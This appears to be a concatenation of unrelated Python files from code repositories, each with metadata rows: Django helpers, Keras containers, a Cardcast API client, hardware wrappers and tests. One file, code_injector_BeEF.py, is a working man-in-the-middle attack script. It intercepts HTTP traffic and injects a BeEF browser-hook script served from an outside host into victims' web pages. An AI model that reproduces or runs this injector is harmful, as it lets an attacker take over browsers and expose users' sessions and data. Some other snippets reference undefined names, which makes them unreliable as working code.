c7a9038c8840f231377e3ea552d065f35efee699 | 289 | py | Python | Python/first_flask_project/utilities/file_reader.py | maxxxxxdlp/code_share | 4f9375bf4bdf6048b54b22bd1fa0d3ad010de7ef | [
"MIT"
] | null | null | null | Python/first_flask_project/utilities/file_reader.py | maxxxxxdlp/code_share | 4f9375bf4bdf6048b54b22bd1fa0d3ad010de7ef | [
"MIT"
] | 33 | 2021-07-11T22:55:42.000Z | 2022-01-07T23:23:43.000Z | Python/first_flask_project/utilities/file_reader.py | maxxxxxdlp/code_share | 4f9375bf4bdf6048b54b22bd1fa0d3ad010de7ef | [
"MIT"
] | null | null | null | def read_csv(root, file_name, keys):
with open('{root}private_static/csv/{file_name}.csv'.format(root=root, file_name=file_name)) as file:
data = file.read()
lines = data.split("\n")
return [dict(zip(keys, line.split(','))) for i, line in enumerate(lines) if i != 0]
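

# Usage sketch (hypothetical CSV layout; assumes a header row and plain comma-separated values):
#
#   rows = read_csv('app/', 'users', ('id', 'name', 'email'))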
| 36.125 | 105 | 0.650519 | 47 | 289 | 3.87234 | 0.574468 | 0.175824 | 0.131868 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004167 | 0.16955 | 289 | 7 | 106 | 41.285714 | 0.754167 | 0 | 0 | 0 | 0 | 0 | 0.148789 | 0.138408 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0 | 0 | 0.4 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c7b11734daef5c05aa9cf025632e59324996f20e | 2,954 | py | Python | customer_support/utils.py | rtnpro/django-customer-support | 6de8d9301fe01a42fa6799757a107be69ee82426 | [
"MIT"
] | 1 | 2017-05-06T04:49:45.000Z | 2017-05-06T04:49:45.000Z | customer_support/utils.py | rtnpro/django-customer-support | 6de8d9301fe01a42fa6799757a107be69ee82426 | [
"MIT"
] | null | null | null | customer_support/utils.py | rtnpro/django-customer-support | 6de8d9301fe01a42fa6799757a107be69ee82426 | [
"MIT"
] | null | null | null | from __future__ import absolute_import
from django.shortcuts import render
import simplejson
import datetime
from django.http import HttpResponse
class GenericItemBase(object):
ITEM_ATTRS = []
def __init__(self, identifier):
self.identifier = identifier
def jsonify(self, value):
"""
Method to convert non JSON serializable objects into
an equivalent JSON serializable form.
"""
return value
def json(self):
raise NotImplementedError
def render_json(self):
raise NotImplementedError
def render_html(self):
raise NotImplementedError
class GenericItem(GenericItemBase):
TEMPLATE = 'customer_support/item.html'
def __init__(self, *args, **kwargs):
super(GenericItem, self).__init__(*args, **kwargs)
self._item = {}
def get_item(self, identifier):
raise NotImplementedError
def set_item(self, data):
self._item = {}
for key, value in data.items():
if key in self.ITEM_ATTRS:
self._item[key] = value
def json(self):
item = {}
for attr_name in self.ITEM_ATTRS:
attr = self.jsonify(self._item[attr_name])
            if isinstance(attr, datetime.datetime):
attr = attr.strftime('%Y-%m-%d %H:%M')
item[attr_name] = attr
return simplejson.dumps(item)
def render_json(self):
return HttpResponse(
self.json(), mimetype='application/json')
def render_html(self):
return render(self.TEMPLATE, {'item': self._item})
class GenericItems(GenericItemBase):
TEMPLATE = 'customer_support/items.html'
def __init__(self, *args, **kwargs):
        super(GenericItems, self).__init__(*args, **kwargs)
self._items = []
def get_items(self, for_entity):
raise NotImplementedError
def set_items(self, items):
self._items = items
def json(self):
items = []
for item in self._items:
item_dict = {}
for attr_name in self.ITEM_ATTRS:
attr = self.jsonify(item[attr_name])
                if isinstance(attr, datetime.datetime):
                    attr = attr.strftime('%Y-%m-%d %H:%M')
                item_dict[attr_name] = attr
            items.append(item_dict)
return simplejson.dumps(items)
def render_json(self):
return HttpResponse(
self.json(), mimetype='application/json')
def render_html(self):
return render(self.TEMPLATE, {'items': self._items})
class GenericActions(object):
def __init__(self, item_id):
self.item_id = item_id
self.actions = []
def get_actions_for_item(self):
raise NotImplementedError
def json(self):
return simplejson.dumps(self.actions)
def render_json(self):
return HttpResponse(self.json(), mimetype='application/json')
def render_html(self):
pass
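

# Subclassing sketch (hypothetical model and attributes; subclasses fill in
# ITEM_ATTRS and the get_* hooks):
#
# class TicketItem(GenericItem):
#     ITEM_ATTRS = ['id', 'title', 'created_at']
#
#     def get_item(self, identifier):
#         self.set_item(Ticket.objects.values().get(pk=identifier))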
| 25.912281 | 69 | 0.613067 | 332 | 2,954 | 5.240964 | 0.213855 | 0.050575 | 0.077586 | 0.03908 | 0.407471 | 0.407471 | 0.360345 | 0.360345 | 0.360345 | 0.360345 | 0 | 0 | 0.28436 | 2,954 | 113 | 70 | 26.141593 | 0.823084 | 0.030467 | 0 | 0.43038 | 0 | 0 | 0.048729 | 0.018715 | 0 | 0 | 0 | 0 | 0 | 1 | 0.278481 | false | 0.012658 | 0.063291 | 0.075949 | 0.544304 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c7b513ddbd33e479f8df70d1c5b9306a2ec0133a | 3,072 | py | Python | mercury_ml/keras/containers.py | gabrieloexle/mercury-ml | cc663f84a26ee66ae105bbfc0cd1cbd5629031cd | [
"MIT"
] | null | null | null | mercury_ml/keras/containers.py | gabrieloexle/mercury-ml | cc663f84a26ee66ae105bbfc0cd1cbd5629031cd | [
"MIT"
] | null | null | null | mercury_ml/keras/containers.py | gabrieloexle/mercury-ml | cc663f84a26ee66ae105bbfc0cd1cbd5629031cd | [
"MIT"
] | null | null | null | """
Simple IoC containers that provide direct access to various Keras providers
"""
class ModelSavers:
from mercury_ml.keras.providers import model_saving
save_hdf5 = model_saving.save_keras_hdf5
save_tensorflow_graph = model_saving.save_tensorflow_graph
save_tensorrt_pbtxt_config = model_saving.save_tensorrt_pbtxt_config
save_tensorrt_json_config = model_saving.save_tensorrt_json_config
save_labels_txt = model_saving.save_labels_txt
save_tensorflow_serving_predict_signature_def = model_saving.save_tensorflow_serving_predict_signature_def
class ModelLoaders:
from mercury_ml.keras.providers import model_loading
load_hdf5 = model_loading.load_hdf5_model
class LossFunctionFetchers:
from mercury_ml.keras.providers import loss_function_fetching
get_keras_loss = loss_function_fetching.get_keras_loss
get_custom_loss = loss_function_fetching.get_custom_loss
class OptimizerFetchers:
from mercury_ml.keras.providers import optimizer_fetching
get_keras_optimizer = optimizer_fetching.get_keras_optimizer
class ModelCompilers:
from mercury_ml.keras.providers import model_compilation
compile_model = model_compilation.compile_model
class ModelFitters:
from mercury_ml.keras.providers import model_fitting
fit = model_fitting.fit
fit_generator = model_fitting.fit_generator
class ModelDefinitions:
from mercury_ml.keras.providers.model_definition import conv_simple, mlp_simple
# these are just two small example model definitions. Users should define their own models
# to use as follows:
# >>> ModelDefinitions.my_model = my_model_module.define_model
define_conv_simple = conv_simple.define_model
define_mlp_simple = mlp_simple.define_model
class GeneratorPreprocessingFunctionGetters:
from mercury_ml.keras.providers.generator_preprocessors import get_random_eraser
get_random_eraser = get_random_eraser
class CallBacks:
from mercury_ml.keras.providers.model_callbacks import TensorBoardProvider, \
BaseLoggerProvider, EarlyStoppingProvider, ModelCheckpointProvider, TerminateOnNaNProvider, \
ProgbarLoggerProvider, RemoteMonitorProvider, LearningRateSchedulerProvider, ReduceLROnPlateauProvider, \
CSVLoggerProvider
tensorboard = TensorBoardProvider
base_logger = BaseLoggerProvider
terminate_on_nan = TerminateOnNaNProvider
progbar_logger = ProgbarLoggerProvider
model_checkpoint = ModelCheckpointProvider
early_stopping = EarlyStoppingProvider
remote_monitor = RemoteMonitorProvider
learning_rate_scheduler = LearningRateSchedulerProvider
reduce_lr_on_plateau = ReduceLROnPlateauProvider
csv_logger = CSVLoggerProvider
class ModelEvaluators:
from mercury_ml.keras.providers import model_evaluation
evaluate = model_evaluation.evaluate
evaluate_generator = model_evaluation.evaluate_generator
class PredictionFunctions:
from mercury_ml.keras.providers import prediction
predict = prediction.predict
predict_generator = prediction.predict_generator
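# --- Usage sketch (illustrative; the argument lists below are assumptions) ---
# The containers are plain namespaces: fetch a provider function by attribute
# and call it directly, e.g.:
#     model = ModelDefinitions.define_conv_simple(...)
#     ModelCompilers.compile_model(model, ...)
#     ModelFitters.fit_generator(model, ...)
#     ModelSavers.save_hdf5(model, ...)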
| 38.4 | 113 | 0.823893 | 341 | 3,072 | 7.046921 | 0.328446 | 0.069913 | 0.059509 | 0.082397 | 0.317104 | 0.225551 | 0.079068 | 0 | 0 | 0 | 0 | 0.001512 | 0.138672 | 3,072 | 79 | 114 | 38.886076 | 0.906652 | 0.079753 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.2 | 0 | 0.945455 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
c7b60df7ecb95aad435c61ec7e818259064a9562 | 1,851 | py | Python | Code Injector/code_injector_BeEF.py | crake7/Defensor-Fortis- | 086b055a10b9ac55f444e8d13b4031f998415438 | [
"MIT"
] | null | null | null | Code Injector/code_injector_BeEF.py | crake7/Defensor-Fortis- | 086b055a10b9ac55f444e8d13b4031f998415438 | [
"MIT"
] | null | null | null | Code Injector/code_injector_BeEF.py | crake7/Defensor-Fortis- | 086b055a10b9ac55f444e8d13b4031f998415438 | [
"MIT"
] | 1 | 2021-12-20T11:44:51.000Z | 2021-12-20T11:44:51.000Z | #!/usr/bin/env python
import netfilterqueue
import scapy.all as scapy
import re
# CHOOSE PORT HERE: 80 for plain HTTP, 10000 when traffic is downgraded through sslstrip.
TARGET_PORT = 80
def set_load(packet, load):
packet[scapy.Raw].load = load
del packet[scapy.IP].len
del packet[scapy.IP].chksum
del packet[scapy.TCP].chksum
return packet
def process_packet(packet):
    """Modify downloaded files on the fly while the target uses HTTP/HTTPS.
    Set TARGET_PORT (defined above) before running: 80 for plain HTTP,
    10000 when traffic is downgraded through sslstrip."""
    scapy_packet = scapy.IP(packet.get_payload())
    if scapy_packet.haslayer(scapy.Raw):
        try:
            load = scapy_packet[scapy.Raw].load.decode()
            if scapy_packet[scapy.TCP].dport == TARGET_PORT:
                print("HTTP(S) Request")
                # print(scapy_packet.show())
                # Strip Accept-Encoding so the response comes back uncompressed.
                load = re.sub("Accept-Encoding:.*?\\r\\n", "", load)
            elif scapy_packet[scapy.TCP].sport == TARGET_PORT:
                print("HTTP(S) Response")
                # print(scapy_packet.show())
                injection_code = '<script src="http://10.0.2.15:3000/hook.js"></script>'
                load = load.replace("</body>", injection_code + "</body>")
                content_length_search = re.search("(?:Content-Length:\s)(\d*)", load)
                if content_length_search and "text/html" in load:
                    # Grow Content-Length to account for the injected script tag.
                    content_length = content_length_search.group(1)
                    new_content_length = int(content_length) + len(injection_code)
                    load = load.replace(content_length, str(new_content_length))
            if load != scapy_packet[scapy.Raw].load.decode():
                new_packet = set_load(scapy_packet, load.encode())
                packet.set_payload(bytes(new_packet))
        except UnicodeDecodeError:
            # Binary payloads (images, archives, ...) cannot be decoded; pass them through.
            pass
    packet.accept()
queue = netfilterqueue.NetfilterQueue()
queue.bind(0, process_packet)
queue.run()
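# --- Usage notes (not part of the original script; commands are typical, verify for your setup) ---
# The script only sees packets that are steered into NFQUEUE 0, e.g.:
#     iptables -I FORWARD -j NFQUEUE --queue-num 0    # when MITM-ing a remote target
#     iptables -I OUTPUT -j NFQUEUE --queue-num 0     # when testing against this machine
#     iptables -I INPUT -j NFQUEUE --queue-num 0
# Run as root; restore normal routing with `iptables --flush` when done.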
| 37.02 | 90 | 0.622366 | 239 | 1,851 | 4.682008 | 0.422594 | 0.088472 | 0.071492 | 0.048257 | 0.103664 | 0.103664 | 0.055407 | 0 | 0 | 0 | 0 | 0.021723 | 0.253917 | 1,851 | 49 | 91 | 37.77551 | 0.788559 | 0.099946 | 0 | 0 | 0 | 0.03125 | 0.102667 | 0.034 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.09375 | null | null | 0.0625 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c7b66acfc0f1fc9f0407ccd4877bc57ccf79afa1 | 4,691 | py | Python | pycardcast/net/aiohttp.py | Elizafox/pycardcast | 36fb8009f32f733fd18a7f3263a61362fdb75ec3 | [
"WTFPL"
] | null | null | null | pycardcast/net/aiohttp.py | Elizafox/pycardcast | 36fb8009f32f733fd18a7f3263a61362fdb75ec3 | [
"WTFPL"
] | null | null | null | pycardcast/net/aiohttp.py | Elizafox/pycardcast | 36fb8009f32f733fd18a7f3263a61362fdb75ec3 | [
"WTFPL"
] | 1 | 2020-04-09T10:12:46.000Z | 2020-04-09T10:12:46.000Z | # Copyright © 2015 Elizabeth Myers.
# All rights reserved.
# This file is part of the pycardcast project. See LICENSE in the root
# directory for licensing information.
import asyncio
import aiohttp
from pycardcast.net import CardcastAPIBase
from pycardcast.deck import (Deck, DeckInfo, DeckInfoNotFoundError,
                             DeckInfoRetrievalError)  # Deck: assumed to live beside DeckInfo
from pycardcast.card import (BlackCard, WhiteCard, CardNotFoundError,
CardRetrievalError)
from pycardcast.search import (SearchReturn, SearchNotFoundError,
SearchRetrievalError)
class CardcastAPI(CardcastAPIBase):
"""A :py:class:`~pycardcast.net.CardcastAPIBase` implementation using the
aiohttp library.
All the methods here are coroutines except for one:
:py:meth:`~pycardcast.net.aiohttp.CardcastAPI.search_iter`.
"""
@asyncio.coroutine
def deck_info(self, code):
        req = yield from aiohttp.request("get", self.deck_info_url.format(
            code=code))
        if req.status == 200:
            json = yield from req.json()
            return DeckInfo.from_json(json)
        elif req.status == 404:
            err = "Deck not found: {}".format(code)
            raise DeckInfoNotFoundError(err)
        else:
            err = "Error retrieving deck: {} (code {})".format(code,
                                                               req.status)
raise DeckInfoRetrievalError(err)
@asyncio.coroutine
def white_cards(self, code):
        req = yield from aiohttp.request("get", self.card_list_url.format(
            code=code))
        if req.status == 200:
            json = yield from req.json()
            return WhiteCard.from_json(json)
        elif req.status == 404:
            err = "White cards not found: {}".format(code)
            raise CardNotFoundError(err)
        else:
            err = "Error retrieving white cards: {} (code {})".format(
                code, req.status)
raise CardRetrievalError(err)
@asyncio.coroutine
def black_cards(self, code):
        req = yield from aiohttp.request("get", self.card_list_url.format(
code=code))
if req.status == 200:
json = yield from req.json()
return BlackCard.from_json(json)
elif req.status == 404:
err = "Black cards not found: {}".format(code)
raise CardNotFoundError(err)
else:
err = "Error retrieving black cards: {} (code {})".format(
code, req.status)
raise CardRetrievalError(err)
@asyncio.coroutine
def cards(self, code):
        req = yield from aiohttp.request("get", self.card_list_url.format(
code=code))
if req.status == 200:
json = yield from req.json()
return (BlackCard.from_json(json), WhiteCard.from_json(json))
elif req.status == 404:
err = "Cards not found: {}".format(code)
raise CardNotFoundError(err)
else:
err = "Error retrieving cards: {} (code {})".format(code,
req.status)
raise CardRetrievalError(err)
@asyncio.coroutine
def deck(self, code):
deckinfo = yield from self.deck_info(code)
cards = yield from self.cards(code)
return Deck(deckinfo, cards[0], cards[1])
@asyncio.coroutine
def search(self, name=None, author=None, category=None, offset=0,
limit=None):
qs = {
"search": name,
"author": author,
"category": category,
"offset": offset,
"limit": (deck_list_max if limit is None else limit)
}
        req = yield from aiohttp.request("get", self.deck_list_url, params=qs)
if req.status == 200:
json = yield from req.json()
return SearchReturn.from_json(json)
elif req.status == 404:
err = "Search query returned not found"
raise SearchNotFoundError(err)
else:
err = "Error searching decks (code {})".format(req.status)
raise SearchRetrievalError(err)
def search_iter(self, name=None, author=None, category=None, offset=0,
limit=None):
        s = asyncio.get_event_loop().run_until_complete(
            self.search(name, author, category, offset, limit))
while s.count > 0:
yield s
offset += s.count
            s = asyncio.get_event_loop().run_until_complete(
                self.search(name, author, category, offset, limit))
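# --- Usage sketch (illustrative; constructor arguments are assumptions) ---
#     api = CardcastAPI()
#     deck = asyncio.get_event_loop().run_until_complete(api.deck("ABC12"))
#     for page in api.search_iter(name="science"):  # plain generator, no coroutine needed
#         print(page.count)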
| 37.830645 | 78 | 0.563206 | 492 | 4,691 | 5.315041 | 0.221545 | 0.051625 | 0.043595 | 0.026769 | 0.540344 | 0.51434 | 0.503633 | 0.491396 | 0.460421 | 0.429828 | 0 | 0.012593 | 0.3398 | 4,691 | 123 | 79 | 38.138211 | 0.83145 | 0 | 0 | 0.49 | 0 | 0 | 0.081339 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.06 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c7b71c7227264e168736696fa5f4ef910e4d9c22 | 2,345 | py | Python | libtiepie/triggeroutput.py | TiePie/python-libtiepie | d2a9875855298a58d6a16be5b61aaa89a558e7d8 | [
"MIT"
] | 6 | 2020-01-04T02:00:35.000Z | 2022-03-22T00:32:26.000Z | libtiepie/triggeroutput.py | TiePie/python-libtiepie | d2a9875855298a58d6a16be5b61aaa89a558e7d8 | [
"MIT"
] | 3 | 2020-08-05T15:16:29.000Z | 2022-03-21T07:00:27.000Z | libtiepie/triggeroutput.py | TiePie/python-libtiepie | d2a9875855298a58d6a16be5b61aaa89a558e7d8 | [
"MIT"
] | null | null | null | from ctypes import *
from .api import api
from .const import *
from .library import library
class TriggerOutput(object):
""""""
def __init__(self, handle, index):
self._handle = handle
self._index = index
def _get_enabled(self):
""" Check whether a trigger output is enabled. """
value = api.DevTrOutGetEnabled(self._handle, self._index)
library.check_last_status_raise_on_error()
return value != BOOL8_FALSE
def _set_enabled(self, value):
value = BOOL8_TRUE if value else BOOL8_FALSE
api.DevTrOutSetEnabled(self._handle, self._index, value)
library.check_last_status_raise_on_error()
def _get_events(self):
""" Supported trigger output events. """
value = api.DevTrOutGetEvents(self._handle, self._index)
library.check_last_status_raise_on_error()
return value
def _get_event(self):
""" Currently selected trigger output event. """
value = api.DevTrOutGetEvent(self._handle, self._index)
library.check_last_status_raise_on_error()
return value
def _set_event(self, value):
api.DevTrOutSetEvent(self._handle, self._index, value)
library.check_last_status_raise_on_error()
def _get_id(self):
""" Id. """
value = api.DevTrOutGetId(self._handle, self._index)
library.check_last_status_raise_on_error()
return value
def _get_name(self):
""" Name. """
length = api.DevTrOutGetName(self._handle, self._index, None, 0)
library.check_last_status_raise_on_error()
buf = create_string_buffer(length + 1)
api.DevTrOutGetName(self._handle, self._index, buf, length)
library.check_last_status_raise_on_error()
return buf.value.decode('utf-8')
def trigger(self):
""" Trigger the specified device trigger output.
:returns: ``True`` if successful, ``False`` otherwise.
.. versionadded:: 0.6
"""
result = api.DevTrOutTrigger(self._handle, self._index)
library.check_last_status_raise_on_error()
return result != BOOL8_FALSE
enabled = property(_get_enabled, _set_enabled)
events = property(_get_events)
event = property(_get_event, _set_event)
id = property(_get_id)
name = property(_get_name)
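# --- Usage sketch (illustrative; not part of the original module) ---
# TriggerOutput objects are normally handed out by a device object rather than
# constructed by hand; `handle` and the index 0 below are assumptions.
#     out = TriggerOutput(handle, 0)
#     out.enabled = True
#     print(out.name)
#     out.trigger()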
| 33.028169 | 72 | 0.665245 | 281 | 2,345 | 5.185053 | 0.252669 | 0.075498 | 0.102951 | 0.117364 | 0.415923 | 0.415923 | 0.365134 | 0.341798 | 0.314345 | 0.314345 | 0 | 0.005017 | 0.234968 | 2,345 | 70 | 73 | 33.5 | 0.807135 | 0.108316 | 0 | 0.255319 | 0 | 0 | 0.002472 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.191489 | false | 0 | 0.085106 | 0 | 0.531915 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
c7b8b9fdf2de5fb240b87971d0e7f35941af2c81 | 1,485 | py | Python | tests/test_render.py | isuruf/conda-build | 9f163925f5d03a46e921162892bf4c6bc86b1072 | [
"BSD-3-Clause"
] | null | null | null | tests/test_render.py | isuruf/conda-build | 9f163925f5d03a46e921162892bf4c6bc86b1072 | [
"BSD-3-Clause"
] | 1 | 2019-10-08T15:03:56.000Z | 2019-10-08T15:03:56.000Z | tests/test_render.py | awwad/conda-build | b0be80283ec2e3ef7e49b5da923b1438e74e27b5 | [
"BSD-3-Clause"
] | null | null | null | import os
import sys
from conda_build import api
from conda_build import render
import pytest
def test_output_with_noarch_says_noarch(testing_metadata):
testing_metadata.meta['build']['noarch'] = 'python'
output = api.get_output_file_path(testing_metadata)
assert os.path.sep + "noarch" + os.path.sep in output[0]
def test_output_with_noarch_python_says_noarch(testing_metadata):
testing_metadata.meta['build']['noarch_python'] = True
output = api.get_output_file_path(testing_metadata)
assert os.path.sep + "noarch" + os.path.sep in output[0]
def test_reduce_duplicate_specs(testing_metadata):
reqs = {'build': ['exact', 'exact 1.2.3 1', 'exact >1.0,<2'],
'host': ['exact', 'exact 1.2.3 1']
}
testing_metadata.meta['requirements'] = reqs
render._simplify_to_exact_constraints(testing_metadata)
assert (testing_metadata.meta['requirements']['build'] ==
testing_metadata.meta['requirements']['host'])
simplified_deps = testing_metadata.meta['requirements']
assert len(simplified_deps['build']) == 1
assert 'exact 1.2.3 1' in simplified_deps['build']
def test_pin_run_as_build_preserve_string(testing_metadata):
m = testing_metadata
m.config.variant['pin_run_as_build']['pkg'] = {
'max_pin': 'x.x'
}
dep = render.get_pin_from_build(
m,
'pkg * somestring*',
{'pkg': '1.2.3 somestring_h1234'}
)
assert dep == 'pkg >=1.2.3,<1.3.0a0 somestring*'
| 33 | 65 | 0.690909 | 207 | 1,485 | 4.676329 | 0.280193 | 0.216942 | 0.117769 | 0.016529 | 0.384298 | 0.334711 | 0.305785 | 0.305785 | 0.305785 | 0.305785 | 0 | 0.026059 | 0.173064 | 1,485 | 44 | 66 | 33.75 | 0.762215 | 0 | 0 | 0.114286 | 0 | 0 | 0.193939 | 0 | 0 | 0 | 0 | 0 | 0.171429 | 1 | 0.114286 | false | 0 | 0.142857 | 0 | 0.257143 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c7b8e20d5ed5e23189a112d56d8a749537d1ecec | 173 | py | Python | ABC/007/b.py | fumiyanll23/AtCoder | 362ca9fcacb5415c1458bc8dee5326ba2cc70b65 | [
"MIT"
] | null | null | null | ABC/007/b.py | fumiyanll23/AtCoder | 362ca9fcacb5415c1458bc8dee5326ba2cc70b65 | [
"MIT"
] | null | null | null | ABC/007/b.py | fumiyanll23/AtCoder | 362ca9fcacb5415c1458bc8dee5326ba2cc70b65 | [
"MIT"
] | null | null | null | def main():
# input
A = input()
# compute
# output
if A == 'a':
print(-1)
else:
print('a')
if __name__ == '__main__':
main()
| 10.8125 | 26 | 0.421965 | 19 | 173 | 3.421053 | 0.578947 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009804 | 0.410405 | 173 | 15 | 27 | 11.533333 | 0.627451 | 0.115607 | 0 | 0 | 0 | 0 | 0.067114 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0 | 0 | 0.125 | 0.25 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c7c52b0c2a58b302536c4281e3d875f7998a6140 | 611 | py | Python | src/helpers.py | demirdagemir/thesis | 4a48bddf815c91729e27484548bb7bbf7ddeda64 | [
"MIT"
] | null | null | null | src/helpers.py | demirdagemir/thesis | 4a48bddf815c91729e27484548bb7bbf7ddeda64 | [
"MIT"
] | null | null | null | src/helpers.py | demirdagemir/thesis | 4a48bddf815c91729e27484548bb7bbf7ddeda64 | [
"MIT"
] | null | null | null | from Aion.utils.data import getADBPath
import subprocess
def dumpLogCat(apkTarget):
# Aion/shared/DroidutanTest.py
# Define frequently-used commands
# TODO: Refactor adbID
adbID = "192.168.58.101:5555"
adbPath = getADBPath()
dumpLogcatCmd = [adbPath, "-s", adbID, "logcat", "-d"]
clearLogcatCmd = [adbPath, "-s", adbID, "-c"]
# 5. Dump the system log to file
logcatFile = open(apkTarget.replace(".apk", ".log"), "w")
prettyPrint("Dumping logcat")
subprocess.Popen(dumpLogcatCmd, stderr=subprocess.STDOUT, stdout=logcatFile).communicate()[0]
logcatFile.close()
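# Usage sketch (illustrative): dump the device log gathered while testing an APK.
# dumpLogCat("/path/to/app.apk")  # writes the log next to the APK as /path/to/app.log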
| 33.944444 | 97 | 0.680851 | 70 | 611 | 5.942857 | 0.742857 | 0.038462 | 0.0625 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.03373 | 0.175123 | 611 | 17 | 98 | 35.941176 | 0.791667 | 0.184943 | 0 | 0 | 0 | 0 | 0.11359 | 0 | 0 | 0 | 0 | 0.058824 | 0 | 1 | 0.090909 | false | 0 | 0.181818 | 0 | 0.272727 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c7c5b3d53e6ad031199ab57c86f15523078de6cc | 1,969 | py | Python | tests/test_show.py | domi007/pigskin | c379284ebbbdb3a9df42de70227041e3c137b6dc | [
"MIT"
] | 6 | 2018-08-15T13:29:22.000Z | 2020-09-12T14:39:20.000Z | tests/test_show.py | domi007/pigskin | c379284ebbbdb3a9df42de70227041e3c137b6dc | [
"MIT"
] | 26 | 2018-08-15T13:08:49.000Z | 2020-01-12T22:27:38.000Z | tests/test_show.py | domi007/pigskin | c379284ebbbdb3a9df42de70227041e3c137b6dc | [
"MIT"
] | 4 | 2018-08-15T13:52:26.000Z | 2019-04-28T17:09:04.000Z | from collections import OrderedDict
import pytest
import vcr
try: # Python 2.7
# requests's ``json()`` function returns strings as unicode (as per the
# JSON spec). In 2.7, those are of type unicode rather than str. basestring
# was created to help with that.
# https://docs.python.org/2/library/functions.html#basestring
basestring = basestring
except NameError:
basestring = str
@pytest.mark.incremental
class TestShow(object):
"""These don't require authentication to Game Pass."""
@vcr.use_cassette('public_API/europe_show.yaml')
@staticmethod
def test_desc(gp):
shows = gp.shows
for s in shows:
show = shows[s]
isinstance(show.desc, basestring)
# content is not required
@vcr.use_cassette('public_API/europe_show.yaml')
@staticmethod
def test_logo(gp):
shows = gp.shows
for s in shows:
show = shows[s]
isinstance(show.logo, basestring)
assert show.logo
@vcr.use_cassette('public_API/europe_show.yaml')
@staticmethod
def test_name(gp):
shows = gp.shows
for s in shows:
show = shows[s]
isinstance(show.name, basestring)
assert show.name
@vcr.use_cassette('public_API/europe_show_seasons.yaml')
@staticmethod
def test_seasons(gp):
shows = gp.shows
for s in shows:
show = shows[s]
assert type(show.seasons) is OrderedDict
assert show.seasons
prev = 9999
for s in show.seasons:
season = show.seasons[s]
# TODO: assert it has content
# TODO: assert is type season
# make sure the years look sane-ish
assert int(s) > 2000 and int(s) < 2050
# make sure it's sorted high to low
assert int(prev) > int(s)
prev = s
| 24.6125 | 79 | 0.584053 | 247 | 1,969 | 4.587045 | 0.396761 | 0.049426 | 0.026478 | 0.070609 | 0.338041 | 0.338041 | 0.338041 | 0.308914 | 0.308914 | 0.308914 | 0 | 0.012918 | 0.33164 | 1,969 | 79 | 80 | 24.924051 | 0.848024 | 0.224479 | 0 | 0.413043 | 0 | 0 | 0.07677 | 0.07677 | 0 | 0 | 0 | 0.012658 | 0.130435 | 1 | 0.086957 | false | 0 | 0.065217 | 0 | 0.173913 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
